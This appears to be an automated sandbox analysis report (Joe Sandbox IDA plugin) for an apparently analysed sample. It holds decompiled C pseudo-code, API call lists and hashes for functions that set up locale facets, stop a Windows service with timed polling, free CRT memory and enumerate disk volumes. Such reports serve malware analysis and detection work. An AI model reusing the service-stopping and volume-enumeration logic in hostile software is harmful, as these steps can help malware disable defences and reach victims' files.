                          				_t66 =  *(_t166 + 0xc);
                          				if((_t66 & 0x00000020) != 0) {
                          					_t163 = E012F9850(0x13aaa84);
                          					_t183 = _t116;
                          					if(_t116 != 0) {
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B09D(__eflags, _t195), _t163);
                          						_t167 = _t167 + 0x10;
                          					} else {
                          						_t108 = E0132EA8A(_t163, _t183, 8);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t108;
                          						_t184 = _t108;
                          						if(_t108 == 0) {
                          							_t108 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *(_t108 + 4) =  *(_t108 + 4) & _t116;
                          							 *_t108 = 0x1376b70;
                          						}
                          						E0131A373(_t184, _t151, _t108, _t163);
                          						_t167 = _t167 + 0xc;
                          					}
                          					_t66 =  *(_t166 + 0xc);
                          				}
                          				if((_t66 & 0x00000004) != 0) {
                          					_t156 = E012F9850(0x13aaa88);
                          					_t186 = _t116;
                          					if(_t116 != 0) {
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B132(__eflags, _t195), _t156);
                          						_t82 = E012F9850(0x13aaa8c);
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B1C7(__eflags, _t195), _t82);
                          						_t85 = E012F9850(0x13aaa90);
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B2F1(__eflags, _t195), _t85);
                          						_t88 = E012F9850(0x13aaa94);
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B25C(__eflags, _t195), _t88);
                          						_t167 = _t167 + 0x40;
                          					} else {
                          						_t91 = E0132EA8A(_t156, _t186, 8);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t91;
                          						_t187 = _t91;
                          						if(_t91 == 0) {
                          							_t91 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *(_t91 + 4) =  *(_t91 + 4) & _t116;
                          							 *_t91 = 0x1376b8c;
                          						}
                          						E0131A373(_t187, _t151, _t91, _t156);
                          						_t175 = _t167 + 0xc;
                          						_t160 = E012F9850(0x13aaa8c);
                          						_t94 = E0132EA8A(_t93, _t187, 8);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t94;
                          						_t188 = _t94;
                          						if(_t94 == 0) {
                          							_t94 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *(_t94 + 4) =  *(_t94 + 4) & 0x00000000;
                          							 *_t94 = 0x1376ba4;
                          						}
                          						E0131A373(_t188, _t151, _t94, _t160);
                          						_t176 = _t175 + 0xc;
                          						 *((intOrPtr*)(_t166 - 0x10)) = E012F9850(0x13aaa90);
                          						_t161 = E0132EA8A(_t160, _t188, 0x58);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t161;
                          						 *(_t166 - 4) = 7;
                          						_t189 = _t161;
                          						if(_t161 == 0) {
                          							_t161 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *((intOrPtr*)(_t161 + 4)) = 0;
                          							_push(0);
                          							_push( *((intOrPtr*)(_t166 + 8)));
                          							 *(_t166 - 4) = 8;
                          							 *_t161 = 0x1376bbc;
                          							 *((char*)(_t161 + 0x28)) = 0;
                          							E0132C74F(_t161, _t150, _t189, _t195);
                          							 *_t161 = 0x1376bf0;
                          						}
                          						 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
                          						E0131A373(_t189, _t151, _t161,  *((intOrPtr*)(_t166 - 0x10)));
                          						_t177 = _t176 + 0xc;
                          						 *((intOrPtr*)(_t166 - 0x10)) = E012F9850(0x13aaa94);
                          						_t162 = E0132EA8A(_t161, _t189, 0x58);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t162;
                          						 *(_t166 - 4) = 0xd;
                          						_t190 = _t162;
                          						if(_t162 == 0) {
                          							_t162 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *(_t162 + 4) =  *(_t162 + 4) & 0x00000000;
                          							_push(0);
                          							_push( *((intOrPtr*)(_t166 + 8)));
                          							 *(_t166 - 4) = 0xe;
                          							 *_t162 = 0x1376bbc;
                          							 *((char*)(_t162 + 0x28)) = 1;
                          							E0132C74F(_t162, _t150, _t190, _t195);
                          							 *_t162 = 0x1376c24;
                          						}
                          						 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
                          						E0131A373(_t190, _t151, _t162,  *((intOrPtr*)(_t166 - 0x10)));
                          						_t167 = _t177 + 0xc;
                          					}
                          					_t66 =  *(_t166 + 0xc);
                          				}
                          				if((_t66 & 0x00000010) != 0) {
                          					_t153 = E012F9850(0x13aaa98);
                          					_t192 = _t116;
                          					if(_t116 != 0) {
                          						_push(_t116);
                          						E0131A373(__eflags, _t151, E0132B386(__eflags, _t195), _t153);
                          						_t71 = E012F9850(0x13aaa9c);
                          						_push(_t116);
                          						_t66 = E0131A373(__eflags, _t151, E0132B41B(__eflags, _t195), _t71);
                          					} else {
                          						_t73 = E0132EA8A(_t153, _t192, 0x44);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t73;
                          						 *(_t166 - 4) = 0x12;
                          						_t193 = _t73;
                          						if(_t73 == 0) {
                          							_t74 = 0;
                          							__eflags = 0;
                          						} else {
                          							_push(_t116);
                          							_push( *((intOrPtr*)(_t166 + 8)));
                          							_t74 = E0132B4B0(_t73, _t195);
                          						}
                          						 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
                          						E0131A373(_t193, _t151, _t74, _t153);
                          						_t117 = E012F9850(0x13aaa9c);
                          						_t155 = E0132EA8A(_t153, _t193, 0xc);
                          						 *((intOrPtr*)(_t166 - 0x14)) = _t155;
                          						_t194 = _t155;
                          						if(_t155 == 0) {
                          							_t155 = 0;
                          							__eflags = 0;
                          						} else {
                          							 *(_t155 + 4) =  *(_t155 + 4) & 0x00000000;
                          							 *_t155 = 0x1376c84;
                          							 *(_t155 + 8) =  *(_t155 + 8) & 0x00000000;
                          							E0132C852(_t117, _t150, _t151, _t194,  *((intOrPtr*)(_t166 + 8)));
                          						}
                          						_t66 = E0131A373(_t194, _t151, _t155, _t117);
                          					}
                          				}
                          				return E0132F190(_t66, _t194);
                          			}

                          APIs
                          • collate.LIBCPMT ref: 0132C88B
                            • Part of subcall function 0132B5B7: __EH_prolog3_GS.LIBCMT ref: 0132B5BE
                            • Part of subcall function 0132B5B7: __Getcoll.LIBCPMT ref: 0132B622
                          • __Getcoll.LIBCPMT ref: 0132C8D1
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C8E5
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C8FA
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C938
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C94B
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C991
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C9C5
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CA80
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CA93
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CAB0
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CACD
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CAEA
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CA22
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • numpunct.LIBCPMT ref: 0132CB29
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CB39
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CB7D
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CB90
                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CBAD
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$H_prolog3_Lockit::_Lockit::~_collatenumpunct
                          • String ID:
                          • API String ID: 4289308570-0
                          • Opcode ID: f56a09563e5a1fcfe1a0058a9718475acfe303b6b1d753b386d50883c4510ee7
                          • Instruction ID: 8c57863212977964d2d45c681cb4cd0d9257ba2d0de5924b4c2c3e7f7bb4b940
                          • Opcode Fuzzy Hash: f56a09563e5a1fcfe1a0058a9718475acfe303b6b1d753b386d50883c4510ee7
                          • Instruction Fuzzy Hash: B591FCB1D012236BFB25BFBD4C11B7F7AA8EF6267DF00442DE949A7240DA7449048BE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E012FBC70(void* __ebx, void* __edi, long _a4, long _a8) {
                          				signed int _v8;
                          				short* _v12;
                          				short* _v16;
                          				signed int _v24;
                          				intOrPtr _v44;
                          				struct _SERVICE_STATUS _v48;
                          				char _v49;
                          				long _v56;
                          				void* _v60;
                          				void* __esi;
                          				signed int _t37;
                          				void* _t42;
                          				struct _SERVICE_STATUS* _t46;
                          				intOrPtr _t48;
                          				struct _SERVICE_STATUS* _t53;
                          				struct _SERVICE_STATUS* _t59;
                          				void* _t63;
                          				void* _t66;
                          				unsigned int _t68;
                          				long _t69;
                          				void* _t70;
                          				void* _t71;
                          				long _t73;
                          				signed int _t74;
                          
                          				_t70 = __edi;
                          				_t37 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t37 ^ _t74;
                          				_t63 = GetTickCount;
                          				_t73 = _a4;
                          				_v49 = 0;
                          				_v56 = GetTickCount();
                          				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
                          					_t42 = OpenSCManagerW(0, 0, 0xf003f);
                          					_v60 = _t42;
                          					if(_t42 != 0) {
                          						if( *((intOrPtr*)(_t73 + 0x14)) >= 8) {
                          							_t73 =  *_t73;
                          						}
                          						_push(_t70);
                          						_t71 = OpenServiceW(_t42, _t73, 0x2c);
                          						if(_t71 != 0) {
                          							_v16 = 0;
                          							_t46 =  &_v48;
                          							_v12 = 0;
                          							asm("xorps xmm0, xmm0");
                          							asm("movups [ebp-0x2c], xmm0");
                          							asm("movups [ebp-0x1c], xmm0");
                          							__imp__QueryServiceStatusEx(_t71, 0, _t46, 0x24,  &_v12);
                          							if(_t46 != 0) {
                          								_t48 = _v44;
                          								if(_t48 != 1) {
                          									_t73 = _a8;
                          									if(_t48 == 3) {
                          										_t66 = 0x2710;
                          										while(1) {
                          											_t68 = 0xcccccccd * _v24 >> 0x20 >> 3;
                          											if(_t68 >= 0x3e8) {
                          												_t69 =  >  ? _t66 : _t68;
                          											} else {
                          												_t69 = 0x3e8;
                          											}
                          											Sleep(_t69);
                          											_t59 =  &_v48;
                          											__imp__QueryServiceStatusEx(_t71, 0, _t59, 0x24,  &_v12);
                          											if(_t59 == 0 || _v44 == 1 || GetTickCount() - _v56 > _t73) {
                          												goto L16;
                          											}
                          											_t66 = 0x2710;
                          											if(_v44 == 3) {
                          												continue;
                          											}
                          											goto L16;
                          										}
                          									}
                          									L16:
                          									E012FBEE0(_t63, _t71, _v60, _t71, _t73);
                          									if(ControlService(_t71, 1,  &_v48) != 0 && _v44 != 1) {
                          										do {
                          											Sleep(_t73);
                          											_t53 =  &_v48;
                          											__imp__QueryServiceStatusEx(_t71, 0, _t53, 0x24,  &_v12);
                          											if(_t53 == 0) {
                          												goto L22;
                          											} else {
                          												if(_v44 == 1) {
                          													_v49 = 1;
                          												} else {
                          													if(GetTickCount() - _v56 <= _t73) {
                          														goto L22;
                          													}
                          												}
                          											}
                          											goto L25;
                          											L22:
                          										} while (_v44 != 1);
                          									}
                          								}
                          							}
                          							L25:
                          							CloseServiceHandle(_t71);
                          						}
                          						CloseServiceHandle(_v60);
                          					}
                          				}
                          				return E0132EA79(_v8 ^ _t74, _t73);
                          			}

                          APIs
                          • GetTickCount.KERNEL32 ref: 012FBC8F
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 012FBCA7
                          • OpenServiceW.ADVAPI32(00000000,?,0000002C,?), ref: 012FBCC5
                          • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?), ref: 012FBCFB
                          • Sleep.KERNEL32(?,?), ref: 012FBD46
                          • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000,?,?), ref: 012FBD59
                          • GetTickCount.KERNEL32 ref: 012FBD69
                          • ControlService.ADVAPI32(00000000,00000001,?,?,00000000,00000000), ref: 012FBD8E
                          • Sleep.KERNEL32(00000000), ref: 012FBDA1
                          • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 012FBDB4
                          • GetTickCount.KERNEL32 ref: 012FBDC4
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 012FBDDA
                          • CloseServiceHandle.ADVAPI32(?), ref: 012FBDE3
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Service$CountQueryStatusTick$CloseHandleOpenSleep$ControlManager
                          • String ID:
                          • API String ID: 165667597-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0135D86B(intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _t25;
                          				intOrPtr* _t26;
                          				intOrPtr _t28;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          				intOrPtr* _t45;
                          				intOrPtr* _t46;
                          				intOrPtr* _t47;
                          				intOrPtr* _t55;
                          				intOrPtr* _t70;
                          				intOrPtr _t74;
                          
                          				_t74 = _a4;
                          				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                          				if(_t25 != 0 && _t25 != 0x13a4190) {
                          					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                          					if(_t45 != 0 &&  *_t45 == 0) {
                          						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                          						if(_t46 != 0 &&  *_t46 == 0) {
                          							E01355C8F(_t46);
                          							E0135CB17( *((intOrPtr*)(_t74 + 0x88)));
                          						}
                          						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                          						if(_t47 != 0 &&  *_t47 == 0) {
                          							E01355C8F(_t47);
                          							E0135CFCB( *((intOrPtr*)(_t74 + 0x88)));
                          						}
                          						E01355C8F( *((intOrPtr*)(_t74 + 0x7c)));
                          						E01355C8F( *((intOrPtr*)(_t74 + 0x88)));
                          					}
                          				}
                          				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                          				if(_t26 != 0 &&  *_t26 == 0) {
                          					E01355C8F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                          					E01355C8F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                          					E01355C8F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                          					E01355C8F( *((intOrPtr*)(_t74 + 0x8c)));
                          				}
                          				E0135D9DC( *((intOrPtr*)(_t74 + 0x9c)));
                          				_t28 = 6;
                          				_t55 = _t74 + 0xa0;
                          				_v8 = _t28;
                          				_t70 = _t74 + 0x28;
                          				do {
                          					if( *((intOrPtr*)(_t70 - 8)) != 0x13a42c8) {
                          						_t31 =  *_t70;
                          						if(_t31 != 0 &&  *_t31 == 0) {
                          							E01355C8F(_t31);
                          							E01355C8F( *_t55);
                          						}
                          						_t28 = _v8;
                          					}
                          					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                          						_t22 = _t70 - 4; // 0xfffffe54
                          						_t29 =  *_t22;
                          						if(_t29 != 0 &&  *_t29 == 0) {
                          							E01355C8F(_t29);
                          						}
                          						_t28 = _v8;
                          					}
                          					_t55 = _t55 + 4;
                          					_t70 = _t70 + 0x10;
                          					_t28 = _t28 - 1;
                          					_v8 = _t28;
                          				} while (_t28 != 0);
                          				return E01355C8F(_t74);
                          			}

                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0135D8AF
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB34
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB46
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB58
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB6A
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB7C
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB8E
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBA0
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBB2
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBC4
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBD6
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBE8
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBFA
                            • Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CC0C
                          • _free.LIBCMT ref: 0135D8A4
                            • Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
                            • Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7
                          • _free.LIBCMT ref: 0135D8C6
                          • _free.LIBCMT ref: 0135D8DB
                          • _free.LIBCMT ref: 0135D8E6
                          • _free.LIBCMT ref: 0135D908
                          • _free.LIBCMT ref: 0135D91B
                          • _free.LIBCMT ref: 0135D929
                          • _free.LIBCMT ref: 0135D934
                          • _free.LIBCMT ref: 0135D96C
                          • _free.LIBCMT ref: 0135D973
                          • _free.LIBCMT ref: 0135D990
                          • _free.LIBCMT ref: 0135D9A8
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E012F59F0(void* __ebx, void* __edi, intOrPtr* _a4) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				short _v532;
                          				short _v534;
                          				short _v536;
                          				short _v538;
                          				char _v540;
                          				short _v1060;
                          				char _v1064;
                          				char _v1068;
                          				char _v1072;
                          				void* _v1076;
                          				signed int _v1080;
                          				char _v1096;
                          				signed int _v1100;
                          				short _v1104;
                          				short _v1120;
                          				signed int _v1124;
                          				short _v1128;
                          				short _v1144;
                          				signed int _v1148;
                          				char _v1152;
                          				short _v1168;
                          				signed int _v1172;
                          				intOrPtr* _v1176;
                          				void* __esi;
                          				signed int _t124;
                          				signed int _t125;
                          				char* _t129;
                          				intOrPtr* _t132;
                          				signed int _t134;
                          				signed int _t136;
                          				signed int _t138;
                          				signed int _t140;
                          				long _t153;
                          				char* _t154;
                          				intOrPtr _t156;
                          				intOrPtr _t159;
                          				char* _t165;
                          				signed int _t168;
                          				intOrPtr _t169;
                          				void* _t180;
                          				short* _t188;
                          				intOrPtr* _t190;
                          				intOrPtr* _t194;
                          				signed int _t205;
                          				void* _t210;
                          				void* _t211;
                          				void* _t212;
                          				char* _t215;
                          				void* _t217;
                          				intOrPtr* _t218;
                          				void* _t219;
                          				void* _t220;
                          				short* _t221;
                          				void* _t223;
                          				signed int _t224;
                          				signed int _t226;
                          				void* _t228;
                          
                          				_t180 = __ebx;
                          				_t224 = _t226;
                          				_t124 =  *0x13a4018; // 0x39cca9f6
                          				_t125 = _t124 ^ _t224;
                          				_v20 = _t125;
                          				 *[fs:0x0] =  &_v16;
                          				_t218 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				_v1172 = _t218;
                          				asm("movq [ebp-0x42c], xmm0");
                          				_v1064 = 0;
                          				_v1176 = _t218;
                          				_v1072 = 0;
                          				_v1068 = 0;
                          				_v1064 = 0;
                          				_v8 = 0;
                          				E013478D0(__edi,  &_v540, 0, 0x208);
                          				_t228 = _t226 - 0x488 + 0xc;
                          				_t129 =  &_v540;
                          				__imp__FindFirstVolumeW(_t129, 0x104, _t125, __edi, _t217,  *[fs:0x0], 0x1365556, 0xffffffff, _t223);
                          				_t215 = _t129;
                          				if(_t215 == 0xffffffff) {
                          					L28:
                          					 *_t218 = _v1072;
                          					 *((intOrPtr*)(_t218 + 4)) = _v1068;
                          					 *((intOrPtr*)(_t218 + 8)) = _v1064;
                          					 *[fs:0x0] = _v16;
                          					_pop(_t219);
                          					return E0132EA79(_v20 ^ _t224, _t219);
                          				} else {
                          					do {
                          						_t132 =  &_v540;
                          						_t210 = _t132 + 2;
                          						do {
                          							_t188 =  *_t132;
                          							_t132 = _t132 + 2;
                          						} while (_t188 != 0);
                          						_t134 = _t132 - _t210 >> 1;
                          						if(_v540 != 0x5c || _v538 != 0x5c || _v536 != 0x3f || _v534 != 0x5c) {
                          							break;
                          						} else {
                          							_t220 = _t134 * 2 - 2;
                          							if( *((short*)(_t224 + _t220 - 0x218)) != 0x5c) {
                          								break;
                          							} else {
                          								if(_t220 >= 0x208) {
                          									E0132EC0C();
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									_push(_t220);
                          									_t221 = _t188;
                          									_t136 =  *(_t221 + 0x44);
                          									if(_t136 >= 8) {
                          										_push(2 + _t136 * 2);
                          										E012F56A0(_t180, _t215,  *((intOrPtr*)(_t221 + 0x30)));
                          										_t228 = _t228 + 8;
                          									}
                          									 *((intOrPtr*)(_t221 + 0x40)) = 0;
                          									 *(_t221 + 0x44) = 7;
                          									 *((short*)(_t221 + 0x30)) = 0;
                          									_t138 =  *(_t221 + 0x2c);
                          									if(_t138 >= 8) {
                          										_push(2 + _t138 * 2);
                          										E012F56A0(_t180, _t215,  *((intOrPtr*)(_t221 + 0x18)));
                          										_t228 = _t228 + 8;
                          									}
                          									 *((intOrPtr*)(_t221 + 0x28)) = 0;
                          									 *(_t221 + 0x2c) = 7;
                          									 *((short*)(_t221 + 0x18)) = 0;
                          									_t140 =  *(_t221 + 0x14);
                          									if(_t140 >= 8) {
                          										_push(2 + _t140 * 2);
                          										E012F56A0(_t180, _t215,  *_t221);
                          									}
                          									 *((intOrPtr*)(_t221 + 0x10)) = 0;
                          									 *(_t221 + 0x14) = 7;
                          									 *_t221 = 0;
                          									return 0;
                          								} else {
                          									 *((short*)(_t224 + _t220 - 0x218)) = 0;
                          									E013478D0(_t215,  &_v1060, 0, 0x208);
                          									_t228 = _t228 + 0xc;
                          									_t153 = QueryDosDeviceW( &_v532,  &_v1060, 0x104);
                          									 *((short*)(_t224 + _t220 - 0x218)) = 0x5c;
                          									if(_t153 != 0) {
                          										_v1152 = 0;
                          										_v1148 = 7;
                          										_v1168 = 0;
                          										_v1128 = 0;
                          										_v1124 = 7;
                          										_v1144 = 0;
                          										_v1104 = 0;
                          										_v1100 = 7;
                          										_v1120 = 0;
                          										_t190 =  &_v1060;
                          										_v8 = 1;
                          										_t211 = _t190 + 2;
                          										do {
                          											_t156 =  *_t190;
                          											_t190 = _t190 + 2;
                          										} while (_t156 != 0);
                          										_push(_t190 - _t211 >> 1);
                          										E012F51B0(_t180,  &_v1168, _t215, _t220,  &_v1060);
                          										_t194 =  &_v540;
                          										_t45 = _t194 + 2; // 0x5e
                          										_t212 = _t45;
                          										do {
                          											_t159 =  *_t194;
                          											_t194 = _t194 + 2;
                          										} while (_t159 != 0);
                          										E012F51B0(_t180,  &_v1144, _t215, _t220,  &_v540);
                          										_v1172 = 0x104;
                          										E012F4F70(_t180,  &_v1096, _t215, _t220, 0x104, 0);
                          										_v8 = 2;
                          										_t164 =  >=  ? _v1096 :  &_v1096;
                          										_t165 =  &_v540;
                          										__imp__GetVolumePathNamesForVolumeNameW(_t165,  >=  ? _v1096 :  &_v1096, _v1172,  &_v1172, _t194 - _t212 >> 1);
                          										if(_t165 == 0) {
                          											_v1080 = 0;
                          											_t167 =  >=  ? _v1096 :  &_v1096;
                          											 *((short*)( >=  ? _v1096 :  &_v1096)) = 0;
                          										} else {
                          											_t205 = _v1172;
                          											_t174 = _v1080;
                          											if(_t205 > _v1080) {
                          												E012F6190(_t180,  &_v1096, _t215, _t205 - _t174, 0);
                          												E012F4B40( &_v1096);
                          											} else {
                          												_v1080 = _t205;
                          												_t178 =  >=  ? _v1096 :  &_v1096;
                          												 *((short*)(( >=  ? _v1096 :  &_v1096) + _t205 * 2)) = 0;
                          												E012F4B40( &_v1096);
                          											}
                          										}
                          										_v8 = 1;
                          										_t168 = _v1100;
                          										if(_t168 >= 8) {
                          											_push(2 + _t168 * 2);
                          											E012F56A0(_t180, _t215, _v1120);
                          											_t228 = _t228 + 8;
                          										}
                          										asm("movups xmm1, [ebp-0x444]");
                          										_t169 = _v1068;
                          										asm("movq xmm2, [ebp-0x434]");
                          										asm("movups [ebp-0x45c], xmm1");
                          										asm("movq [ebp-0x44c], xmm2");
                          										if(_t169 == _v1064) {
                          											E012F6440(_t180,  &_v1072, _t169,  &_v1168);
                          										} else {
                          											asm("movups xmm0, [ebp-0x48c]");
                          											 *((intOrPtr*)(_t169 + 0x10)) = 0;
                          											_v1168 = 0;
                          											asm("movups [eax], xmm0");
                          											_v1104 = 0;
                          											asm("movq xmm0, [ebp-0x47c]");
                          											asm("movq [eax+0x10], xmm0");
                          											asm("movups xmm0, [ebp-0x474]");
                          											_v1152 = 0;
                          											_v1148 = 7;
                          											asm("movups [eax+0x18], xmm0");
                          											_v1144 = 0;
                          											asm("movq xmm0, [ebp-0x464]");
                          											asm("movq [eax+0x28], xmm0");
                          											asm("movups [eax+0x30], xmm1");
                          											_v1128 = 0;
                          											asm("movq [eax+0x40], xmm2");
                          											_v1068 = _v1068 + 0x48;
                          											_v1124 = 7;
                          											_v1100 = 7;
                          											_v1120 = 0;
                          										}
                          										_v8 = 0;
                          										L30();
                          									}
                          									goto L26;
                          								}
                          							}
                          						}
                          						goto L37;
                          						L26:
                          						_t154 =  &_v540;
                          						__imp__FindNextVolumeW(_t215, _t154, 0x104);
                          					} while (_t154 != 0);
                          					__imp__FindVolumeClose(_t215);
                          					_t218 = _v1176;
                          					goto L28;
                          				}
                          				L37:
                          			}
                          0x012f5dda
                          0x012f5d37
                          0x012f5d37
                          0x012f5d3e
                          0x012f5d47
                          0x012f5d4e
                          0x012f5d51
                          0x012f5d57
                          0x012f5d5f
                          0x012f5d64
                          0x012f5d6b
                          0x012f5d75
                          0x012f5d7f
                          0x012f5d83
                          0x012f5d8a
                          0x012f5d92
                          0x012f5d97
                          0x012f5d9b
                          0x012f5da1
                          0x012f5da8
                          0x012f5daf
                          0x012f5db9
                          0x012f5dc3
                          0x012f5dc3
                          0x012f5de5
                          0x012f5de9
                          0x012f5de9
                          0x00000000
                          0x012f5b60
                          0x012f5b13
                          0x012f5b07
                          0x00000000
                          0x012f5dee
                          0x012f5df3
                          0x012f5dfb
                          0x012f5e01
                          0x012f5e0a
                          0x012f5e10
                          0x00000000
                          0x012f5e10
                          0x00000000

                          APIs
                          • FindFirstVolumeW.KERNEL32(?,00000104,39CCA9F6), ref: 012F5A88
                          • QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 012F5B4B
                          • GetVolumePathNamesForVolumeNameW.KERNEL32(0000005C,?,00000104,00000104,00000104,00000000,0000005C,0000005A,?,?), ref: 012F5C5B
                          • FindNextVolumeW.KERNEL32(00000000,0000005C,00000104), ref: 012F5DFB
                          • FindVolumeClose.KERNEL32(00000000), ref: 012F5E0A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Volume$Find$CloseDeviceFirstNameNamesNextPathQuery
                          • String ID: ?$H$\$\$\
                          • API String ID: 1315226759-2772711985
                          • Opcode ID: b3385077e77aa403fd61e97550a3a433c7845a2981806470794ae1e973da7c55
